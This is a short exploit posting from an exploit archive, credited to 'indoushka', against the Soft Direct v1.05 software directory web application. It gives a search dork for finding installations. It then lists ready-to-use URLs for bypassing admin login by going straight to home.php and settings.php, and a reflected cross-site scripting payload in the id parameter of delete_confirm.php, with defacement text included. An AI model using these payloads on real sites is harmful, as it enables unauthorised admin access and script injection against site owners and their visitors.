Soft Direct v1.05 Multiple Vulnerabilities

2010-01-18T00:00:00
ID 1337DAY-ID-10693
Type zdt
Reporter indoushka
Modified 2010-01-18T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ==========================================
Soft Direct v1.05 Multiple Vulnerabilities
==========================================

========================================================================================                 
| # Title        : Soft Direct v1.05 Multti Vulnerability     
| # Author       : indoushka
| # Dork         : [ Software Directory Powered by SoftDirec 1.05 ]                                     
| # Tested on    : windows SP2 Fran?ais V.(Pnx2 2.0) + Lunix Fran?ais v.(9.4 Ubuntu)      
| # Bug          : Mullti                                                                   
======================      Exploit By indoushka       =================================
# Exploit  :
  
 1- By Pass Login
  
 http://127.0.0.1/softdirec/admin/home.php
  
 http://127.0.0.1/softdirec/admin/settings.php
  
 2- XSS
  
http://127.0.0.1/softdirec/library/delete_confirm.php?delete=yes&id=>"><ScRiPt%20%0a%0d>alert(213771818860)%3B</ScRiPt>&return=souk%20naamane&type=hacked%20by&catdel=indoushka



#  0day.today [2018-03-13]  #